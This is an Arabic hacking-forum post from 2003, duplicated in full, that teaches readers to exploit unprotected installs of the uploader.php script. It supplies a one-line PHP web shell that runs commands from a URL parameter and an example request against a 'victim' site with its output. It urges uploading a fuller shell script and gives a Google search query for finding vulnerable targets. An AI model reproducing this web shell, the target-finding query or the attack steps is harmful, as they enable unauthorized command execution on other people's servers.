hi_HaCkEr
18-05-2003, 03:38
هي ثغرة في برنامج uploader.php وهو متوفر باصدارة 1.1 وتسمح لك برفع اي ملف اوحتى سكربتات php
وتستطيع تحميله من http://www.phpscriptcenter.com/uploader.php
الاسكربت من اسمه يتضح بانه يعطيك ميزة رفع ملفات لموقعك مباشرة لكن (( بوجود باسورد ))
طيب اذا لم يكن محمى بباسوورد اذا السيرفر كله سيصبح تحت سيطرتك اذا لم يكن في حالة safe_mode اما اذا كان سيف مود فالموقع فقط سيصبح تحت سيطرتك
اذا حملت الملف لموقعك فقم بتغيير الباسوورد وتستطيع عمل ذلك من ملف setup.php
open setup.php and edit these options افتح الملف واستعرض هذا الاعدادات
--------------------------------------------------------------------------------------
$ADMIN[RequirePass] = "Yes"; // Checks to see if upload has a vaild
password
$ADMIN[Password] = "password"; // This is the password if the above قم بتغيير الباسوورد من هناااا
option is Yes
$ADMIN[UploadNum] = "5"; // Number of upload feilds to put on the html عدد الملفات
page
$ADMIN[directory] = "uploads"; // The directory the files will be
uploaded to (must be chmoded to 777) اسم مجلد الملف اتركه كما هو او غيره فلك الخيار
----------------------------------------------------------------------------------------
طبعا ان لم يكن الملف محمي بباسوورد فتستطيع تحميل اي ملف وسيكون بداخل مجلد uploads
فاذا رفعنها مثلا هذا الاسكربت
<?php
$cmd = $_GET["cmd"];
system("$cmd");
?>
سنصل للـ cmd ونستطيع تنفيذ اوامر على السيرفر ...... etc
فاذا نفذنا
http://www.victim.com/uploads/shellemul.php?cmd=id
سيكون الناتج مثلا
uid=21(apache) gid=21(apache) groups=21(apache)
طبعا هذا سكربت بسيط ولمزيد من الرفاهية ارفع سكربت الشل او اي سكربت مماثل له واستمتع ( ان لم يكن السيرفر في حالة سيف مود)
طريقة البحث عن هذه الثغرة
ابحث في جوجل متبعا هذه الطريقة
allinurl: uploader.php
وسترى النتائج
وختاما اتمنى ان يكون الموضوع مفيدا للجميع
وتقبلوا تحيات محبكم
/////////////////////////////////
الكاتب / hi_HaCkEr
/////////////////////////////////
أتمنى نقل الموضوع للفائدة ولكن بشرط ان يذكر المصدر
C Y
وتستطيع تحميله من http://www.phpscriptcenter.com/uploader.php
الاسكربت من اسمه يتضح بانه يعطيك ميزة رفع ملفات لموقعك مباشرة لكن (( بوجود باسورد ))
طيب اذا لم يكن محمى بباسوورد اذا السيرفر كله سيصبح تحت سيطرتك اذا لم يكن في حالة safe_mode اما اذا كان سيف مود فالموقع فقط سيصبح تحت سيطرتك
اذا حملت الملف لموقعك فقم بتغيير الباسوورد وتستطيع عمل ذلك من ملف setup.php
open setup.php and edit these options افتح الملف واستعرض هذا الاعدادات
--------------------------------------------------------------------------------------
$ADMIN[RequirePass] = "Yes"; // Checks to see if upload has a vaild
password
$ADMIN[Password] = "password"; // This is the password if the above قم بتغيير الباسوورد من هناااا
option is Yes
$ADMIN[UploadNum] = "5"; // Number of upload feilds to put on the html عدد الملفات
page
$ADMIN[directory] = "uploads"; // The directory the files will be
uploaded to (must be chmoded to 777) اسم مجلد الملف اتركه كما هو او غيره فلك الخيار
----------------------------------------------------------------------------------------
طبعا ان لم يكن الملف محمي بباسوورد فتستطيع تحميل اي ملف وسيكون بداخل مجلد uploads
فاذا رفعنها مثلا هذا الاسكربت
<?php
$cmd = $_GET["cmd"];
system("$cmd");
?>
سنصل للـ cmd ونستطيع تنفيذ اوامر على السيرفر ...... etc
فاذا نفذنا
http://www.victim.com/uploads/shellemul.php?cmd=id
سيكون الناتج مثلا
uid=21(apache) gid=21(apache) groups=21(apache)
طبعا هذا سكربت بسيط ولمزيد من الرفاهية ارفع سكربت الشل او اي سكربت مماثل له واستمتع ( ان لم يكن السيرفر في حالة سيف مود)
طريقة البحث عن هذه الثغرة
ابحث في جوجل متبعا هذه الطريقة
allinurl: uploader.php
وسترى النتائج
وختاما اتمنى ان يكون الموضوع مفيدا للجميع
وتقبلوا تحيات محبكم
/////////////////////////////////
الكاتب / hi_HaCkEr
/////////////////////////////////
أتمنى نقل الموضوع للفائدة ولكن بشرط ان يذكر المصدر
C Y